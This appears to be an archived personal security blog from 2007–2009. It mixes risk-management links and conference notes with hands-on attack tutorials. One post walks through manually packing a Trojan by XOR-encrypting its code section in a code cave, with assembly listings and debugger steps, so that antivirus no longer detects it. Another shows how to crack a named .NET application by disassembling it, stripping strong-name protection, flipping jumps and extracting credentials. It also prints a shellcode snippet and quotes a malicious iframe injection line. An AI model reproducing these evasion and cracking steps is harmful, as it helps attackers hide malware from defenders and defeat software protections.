Davidi.org

Exploit of the day

2009-01-10T13:17:00.002+02:00

Recantly i have publish a post dealing with an old security issue, with all that related to using signature based mechanism in order to block malware content.

As mantioned in that article i have used a theoretical tool that might bypass some of the Security Web proxy availble.

From time to time , i will publish some POC that were produced with that theoretical tool.

It is strictly written for educational purpose. Use it at
your own risk. Author will not bare any responsibility for any damages watsoever

See samples here

RBN?

2008-08-11T01:47:00.002+03:00

Today i came across with an hacked web site containing some javascript files pointing to a static IP. The content of the webpage hosted by the infected PCs is an iframe from 91.203.93.4, inserted via javascript like this:

document.write "-i-frame sr-c=h||p://91.203.93.4/ cgi-bin/index.cgi?ad width=0 height=0 frameborder=0 iframe " ;

You can read more about it on:

http://www.matchent.com/wpress/index.php?q=comment/reply/365

The FaceBook virus / worm

2008-08-07T20:50:00.011+03:00

---------- Today i so 2 strange mesages from my facebook friends.

- both of them were the same, and i remember that i so an article today about a facebook virus/worm.

- The link directed me to the code in the image, that linked to download a worm.

BlackHat USA 2008

2008-07-02T03:13:00.004+03:00

Coming soon, in August 2-7, Las Vegas, USA

The Black Hat Briefings return to the venerable Caesars Palace Hotel and Casino for another installment of the premier North American technical information security conference.

Every year the lineup of presentations helps define the security headlines for the following year and 2008 will be no exception."

Last year, as was published in my blog before, I met some great Israeli security researchers on the conference, which I was more than proud to learn from and share knowledge.

One of them was Aviv Raff which also lectured there on the Defcon summit, and will probably be there this year, and hopefully share some of his thoughts "live".

This year, we will be honored also to get notes, remarks and overall description from another security specialist, Jacky Altal

EXE PACKING – The Hard Way

2008-06-30T04:09:00.004+03:00

By Jacky Altal

Manual packing an application is an important procedure that can be done easily. There are many reasons to pack an application file, for example to secure it from functionality modifications or any other malicious attacks. Hackers use this method to inject malicious code into applications in order to camouflage harmful code.

Another good use for manual packing would be to bypass Anti Virus software and make arbitrary malicious code to become AV`s best friend.

Firstly, the entire table section (.text, .date, .rsrc) needs to be encrypted. Alternatively, if the location of the virus signature is known, then only the specific bytes require encrypting. Then it is stored in an unencrypted cave area. A small XOR function needs to be coded to encrypt the code and save to a file.

Once the file is encrypted, it needs to be executed again and the XOR function will run first. This time, the code will be decrypted back to its original state and the file will run in real-time unrecognizable by the anti-virus.
What is XOR function
XOR, also known as Exclusive OR, is a bitwise operator from binary mathematics. The XOR operator returns a 1 when the value of either the first bit or the second bit is a 1. The XOR operator returns a 0 when neither or both of the bits is 1.
This is best illustrated in the following chart:
F.bit S.bit Result
F F F
F T T
T F T
T T F

The XOR operator is used to "flip" bits (zeroes and ones) in a piece of plaintext to create a cipher text. In other words, if the code section is XORed twice with the same key, it will return to its original state.

Entry Point <---
jump to encrypt/cave code

Code Cave <---
XOR function encrypt/decrypt

End Cave <---

Replace Entry Point with a JMP to the crypto routine, Insert the crypto routine into the code cave, then insert the deleted command (the one that was deleted) and then go back to the original coded entry command after the hooked entry command has executed.

The crypto code needs to be run once in order to encrypt the entire section and then it needs to be saved to a file. The next time that the file is run, the crypto routine will decrypt the code section back to its original state.

Tools

Infected exe (Trojan)
Ollydbg
LordPE

Hands On

Open up your infected file with Ollydbg and copy the first few commands (backup the commands to a text file). Mark the first few lines and right click copy to clipboard and paste it into a text file.

-=:Entry Code:=-

00401219 >/$ 64:A1 00000000 MOV EAX,DWORD PTR FS:[0]
0040121F |. 55 PUSH EBP
00401220 |. 89E5 MOV EBP,ESP
00401222 |. 6A FF PUSH -1

Go to the end of the file and look for DB 00 in the code cave (at the end of the file) and first try to write to that area. If the section is writeable then you are set and you don’t need to change the section permissions.

-=:Cave Code:=-

0040E4FD 0000 ADD BYTE PTR DS:[EAX],AL
0040E4FF 0000 ADD BYTE PTR DS:[EAX],AL
0040E501 0000 ADD BYTE PTR DS:[EAX],AL
0040E503 0000 ADD BYTE PTR DS:[EAX],AL

If you receive an error message it means that this area is protected, and we will need to modify the PE section to allow us to write to this area. It can be easily done with LordPE (edit the section properties).

Open up LordPE, load your file and click on the Section button. Once done, right click the data section and choose the properties window. Click the checkboxes to make the file writeable and executable. The file is done.

The following routine will be used to XOR the data section. Actually, this is a simple encryption routine that will start to XOR every byte from the data section (@0040129c) with our key (0f). The loop will stop at the end of the data section (@0040E46C).

Encryption Routine
mov eax,0040129c
xor byte [eax],0f
inc eax
cmp eax,0040E46C
jle [xor address]

Deleted Call
00401219 >/$ 64:A1 00000000 MOV EAX,DWORD PTR FS:[0]
0040121F |. 55 PUSH EBP

Jump back to application flow
00401219 > E9 E2D20000 JMP finish1t.0040E500
0040121E 90 NOP

The final code should look like the following:

XOR Loop + Deleted Call + Jump back to application flow.

Code Cave:
0040E500 B8 9C124000 MOV EAX,finish1t.0040129C ; Entry address
0040E505 8030 0F XOR BYTE PTR DS:[EAX],0F
0040E508 0 INC EAX
0040E509 3D 6CE44000 CMP EAX,; Entry address
0040E50E 7E F5 JLE SHORT finish1t.0040E505
0040E510 64:A1 00000000 MOV EAX,DWORD PTR FS:[0]
0040E516 E9 042DFFFF JMP finish1t.0040121F

Now, Lets put a break point at the end of the loop; line 0040e510 and execute the code. Once the execution stops, save the file and exit ollydbg.

00401219 >/$ 64:A1 00000000 JMP finish1t. 0040E500

Last but not least, double check that you changed the application flows to jump to the cave code address.

The file is unrecognized by the antivirus software now. File is ready.

Security Risk Management PPT

2008-02-29T14:03:00.013+02:00

Download Security Risk Management MS PPT here

Download Security Risk Management OCTAVE PPT
here

Download Security Risk Management SCADA PPT
here

Download
Security Risk Management COBRA PPT
here

Many PPT on Risk assessment can be found here and on Risk managment here

The Threats and Countermeasures Guide

2008-02-14T15:42:00.003+02:00

Brief Description

Security Settings in Windows Server 2003 and Windows XP
The Threats and Countermeasures guide provides you with a reference to all security settings that provide countermeasures for specific threats against current versions of the Microsoft® Windows® operating systems

Download the guied here

This guide is a companion for two other publications that are available from Microsoft:

• Windows Server 2003 Security Guide, available online at
http://go.microsoft.com/fwlink/?LinkId=14845

• Windows XP Security Guide, available online at
http://go.microsoft.com/fwlink/?LinkId=14839

Additional useful info while Assessing Risk

2008-02-14T13:43:00.005+02:00

Asset Classes

For additional information on defining and categorizing information and information systems, refer to National Institute of Standards and Technology (NIST) Special Publication 800-60 workshops, "Mapping Types of Information and Information Systems to Security Categories," and the Federal Information Processing Standards (FIPS) publication 199, "Security Categorization of Federal Information and Information Systems."

for "Common Information System Assets" http://www.microsoft.com/technet/security/guidance/complianceandpolicies/secrisk/srappb.mspx

for "Common Threats"
http://www.microsoft.com/technet/security/guidance/complianceandpolicies/secrisk/srappc.mspx

for examples of "Vulnerabilities"
http://www.microsoft.com/technet/security/guidance/complianceandpolicies/secrisk/srappd.mspx

More info on Security Risk Management

2008-02-14T10:41:00.004+02:00

"Microsoft’s approach to risk management and assessment isn’t the only one available to organizations. Some other popular approaches include:

* Risk Management Guide for Information Technology Systems and Security Self-Assessment Guide for Information Technology Systems, both developed by the National Institute for Standards and Technology (NIST)

http://csrc.nist.gov/publications/nistpubs/800-30/sp800-30.pdf
http://csrc.nist.gov/publications/nistpubs/800-26/sp800-26.pdf

* Information technology — Code of practice for information security management (ISO 17799), available from the International Standards Organization (ISO).

http://www.iso.org/iso/en/CatalogueDetailPage.CatalogueDetail?CSNUMBER=33441&ICS1=35&ICS2=40&ICS3=

* Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE) from Computer Emergency Response Team (CERT) at the Software Engineering Institute at Carnegie-Mellon University.

http://www.cert.org/octave

These resources are also useful in helping you plan and implement an effective risk management solution for your company. But in my opinion, Microsoft’s approach is simple and easy to implement, and is a good starting point, especially for IT shops that are strong on Microsoft platforms. For although the Guide is described by Microsoft as being cross-platform and vendor-neutral in its approach, its prescriptive control solutions target Microsoft products in particular. That doesn’t surprise me however, and in no way reduces the usefulness of this excellent Guide."

Read source...

What is my Windows password ?

2007-12-22T12:47:00.001+02:00

There are some live CDs that are used to recover the Windows Password (in case you forgot what it is) as well as other things.

One of them is ophcrack
(Remember ERD commander 2005?)

See how it is simple to use Ophcrack in here

More info:
http://home.eunet.no/~pnordahl/ntpasswd/
http://www.jms1.net/ie.shtml
http://geeksaresexy.blogspot.com/2005/12/auditing-your-users-passwords-for.html
http://www.ultimatebootcd.com/
http://sourceforge.net/projects/austrumi/
http://geeksaresexy.blogspot.com/2006/04/cracking-your-windows-sam-database-in.html

Risk Assessment, continue

2007-11-08T14:06:00.001+02:00

The sum was sent

More info on "Assessing Risk" can be found here

Risk Assessment part 1

2007-09-19T08:22:00.001+02:00

As promised I will publish in the next days the sum of the lecture that I presented on 18/09/2007 at the technion class.

it will include all the links, tools and highlights.
You will be more than welcomed to comment if some thing is missing.

In general , more info can be found on

1.http://www.microsoft.com/technet/security/topics/complianceandpolicies/secrisk/srsgch04.mspx (Security Risk Management Guide )

2. Michael J. Murphy's Web Log

Find security training events:
http://www.microsoft.com/seminar/events/security.mspx
Sign up for security communications:
http://www.microsoft.com/technet/security/signup/ default.mspx
Order the Security Guidance Kit:
http://www.microsoft.com/security/guidance/order/ default.mspx
Get additional security tools and content:
http://www.microsoft.com/security/guidance

Download MSAT ver 3.0 on:
http://www.microsoft.com/downloads/details.aspx?FamilyId=6D79DF9C-C6D1-4E8F-8000-0BE72B430212&displaylang=en

recommnded site of the week

2007-09-14T11:50:00.000+02:00

This site was recomended by my friend ^E^.

You can find there some great simple tools for spoofind, port scanning, web security, wireless, honypots ,audits and more

spoofing
http://www.hackerscenter.com/directory.asp?id=18

port scanning
http://www.hackerscenter.com/directory.asp?id=17

web security
http://www.hackerscenter.com/directory.asp?id=16

they have also released their ethical hackers tool kit

enjoy

Just some good basic downloads

2007-09-04T13:35:00.000+03:00

Hi,

Recently I was asked to recommend some basic useful links
I will present them shortly and give more details in the future

Metasploit
http://framework.metasploit.com/msf/downloader/?id=framework-3.0.exe

Tor
http://tor.eff.org/dist/vidalia-bundles/vidalia-bundle-0.1.2.17-0.0.14.exe

Cain
http://www.oxid.it/cain.html

Nmap
http://download.insecure.org/nmap/dist/nmap-4.22SOC6-setup.exe

Ethereal
http://www.ethereal.com/distribution/win32/ethereal-setup-0.99.0.exe

Risk assessment & managment

2007-08-29T13:35:00.000+03:00

I am going to lecture at the technion on “Risk assessment & management” on
- 18/09/2007
- 23/09/2007
The summery of the lectures will be publish on 24/09/07

More lecture's subjects and dates will be publish soon.

wild but not from the wild - viagra shell code

2007-08-21T14:55:00.000+03:00

viagra shell code - By Jacky Altal ... and Davidi
----------------------------------
"Shellcode may be used as an exploit payload, providing a cracker with, typically, command line access to a computer system with the privileges of the process that has been exploited" - quoted from wikipedia.

We founded our self using fixed Payloads written by metasploit group (HD More, Skype). Usaully, the Download && Execute, Windows Execute Command, Windows Bind Shell and obviously the Reverse Shell are the easiest to understand especially when you are new to the shell code area. In order to add some fun , here is an hearable shell code to add to the personal arsenal kit.

This is quite big shell code and it cant be used on small buffers but still...
Cant stop smiling while running my shell code again and again.

This is only a taste of the shell code source. you can find it all in the following link: HackingDefined

Credits Jacky Altal

void main(void)
{

__asm (

mov eax,345 //1b8h
mov ebx,392 //1f4h
push eax
push ebx
mov edx,0x7c837a77
call edx

mov eax,500
mov ebx,326
push eax
push ebx
mov edx,0x7c837a77
call edx

);
}

Enjoy,

.Net Password Cracking by Jacky Altal and Amir Davidi

2007-08-19T17:51:00.001+03:00

.Net Password Cracking by Jacky Altal and Amir Davidi

Overview:

Papers saying that 95% of the .NET applications are vulnerable to a simple cracking method, in my experience most of the .NET are too easy to crack and most of them are considered to be level one cracking. I don’t think that a high programming level should be required to accomplish this task. Actually it is much easy to crack .NET files then any other type of EXE. You are going to need a Brain……

What are .NET assemblies?

- .NET assemblies (Apps, Dlls) are running on .NET Framework
- .Net solutions/projects compiled into MSIL (Microsoft Intermediate Language) and then assembled to .NET assemble

Tools:

.NET framework comes with two important tools:
ILDASM - .NET de-assemble
ILASM - .NET assemble

Logical Steps:

- .NET de-assembling
- MSIL code editing
- .NET re-assembling

Let's start cracking…………….InternetTV

1. Install the application.
2. Insert any password that you want and take a note of the error message.
3. Locate the exe file.
4. Open ILDASM.
5. Change (C)onditional jumps to the opposite value (82 to 83)
6. Re-assemble file

ILDASM

ILDASM is a Microsoft tool that used to examine .NET assembly files. With ILDASM we can generate ILCODE from a given assembly file.

Let's open the InternetTV executable file:

C:\Program Files\Microsoft Visual Studio 8\SDK\v2.0\Bin>ildasm "C:\Documents and Settings\jacky\MyDocuments\VisualStudio2005\Projects\ InternetTV \bin\Debug\AyalonHighWayViewer.exe" /out="c:\InternetTV.il" /text

Now we have a disassembly file that we can work on. And named InternetTV.il

Open the new file (InternetTv.il) with your favorite editor and start editing it. Actually our goal is to remove the Secure Name Protection from the code and then search for username and password values. This step is very trivial and easy (if you want to understand more about the method just google it). As for now we will just remove it from our code and move on to the credentials values.

Search for "publickey" and remove it (if exists) then search for Password and User fields Get your values and you are set……

Re-Assembly

We will use the ILASM file to re assembly our file (comes with VS.NET)

C:\Program Files\Microsoft Visual Studio 8\SDK\v2.0\Bin>ilasm C:\ILCODE\ InternetTV.il /resource=C:\ILCODE\ InternetTV.res /output=C:\InternetTV.exe

Last step:

Copy the new InternetTV.EXE file to your installed directory and run it……….

In the next tutorial we will learn how to inject functions into another .NET application…..

Enjoy.

Download
http://www.hackingdefined.com/cracking-net.rar
Info:
http://visualbasic.about.com/gi/dynamic/offsite.htm?site=http://sourceforge.net/projects/sharpdevelop

KISS principle

2007-08-15T21:19:00.000+03:00

Some one that I truly respect asked me today to explain how I performed something related to security issue. This person is a great source of knowledge for all that concern "Application security", and one hell of a smart guy.

While trying to figured out how to explain it, and yet not expose my deepest technical secrets, I remembered one great subject that once I was honored to learn about.

It called "KISS".

"The term KISS is an acronym of the phrase 'Keep It Simple, Stupid', and the KISS principle states that design simplicity should be a key goal and unnecessary complexity avoided. It serves as a useful and frequent verbal exhortation (or even dedicated policy) in software development, animation, engineering, and in strategic planning (especially military operations). Other versions of the phrase include "Keep It Simple & Stupid" (most recently used in west-European literature), "Keep It Sweet & Simple," "Keep It Short & Simple," "Keep it Simple, Sweetheart," and "Keep it Simple, Sherlock," and the obvious scatalogical variation.

The principle roughly corresponds to Occam's razor, and to Albert Einstein's maxim that "everything should be made as simple as possible, but no simpler."[1]

Leonardo da Vinci, who lived after Ockham’s time, had his own variant of Occam’s Razor, sidestepping the need for sophistication by equating it to simplicity: "Simplicity is the ultimate sophistication"
--------------------------------------------------

Taken from http://en.wikipedia.org/wiki/KISS_principle

XSS fun

2007-08-14T17:22:00.000+03:00

Credit to http://sla.ckers.org/forum/read.php?3,44,page=51
Thanks also to Golan Yosef (finjan,mcrc)

Sample 1
Sample 2
Sample 3

New pictures from BlackHat & defcon 2007

2007-08-10T07:04:00.000+03:00

"Insomnia is a sleep disorder characterized by an inability to sleep and/or inability to remain asleep for a reasonable period. Insomniacs typically complain of being unable to close their eyes or "rest their mind" for more than a few minutes at a time. Both organic and nonorganic insomnia constitute a sleep disorder.[1][2] It can be caused by fear, stress, anxiety, medications, herbs, caffeine, depression, or bipolar disorder and sometimes occurs for no apparent reason. An overactive mind or physical pain may also be causes. Finding the underlying cause of insomnia is usually necessary to cure it. Insomnia can be common after the loss of a loved one, even months or a year after the death, if they are not grieving correctly (pretending they are over it when they are not). It very often occurs when the person has a lack of food or not enough variety of foods (such as eating one food over and over again)." (http://en.wikipedia.org/wiki/Insomnia)

Instead of sleeping ... why not adding some pictures to the blog?
See below the link

On 09-08-07 , WTF

2007-08-09T23:45:00.000+03:00

"Actually, i am just testing to see if this system works."

I bet that most new blogs first statment is identical or similar to the above, but after a while the admin delete it (betting is a new habbit that i have imported latly)

While trying to get over with one week (*) Jet lag i got, from firsly visit in the US (VEgas.. Yoo hoo), and from some weird and not specific reasonable reason, i have decided that openning my own blog will cure the problem.(* "Problem" - See above for legal clarifications)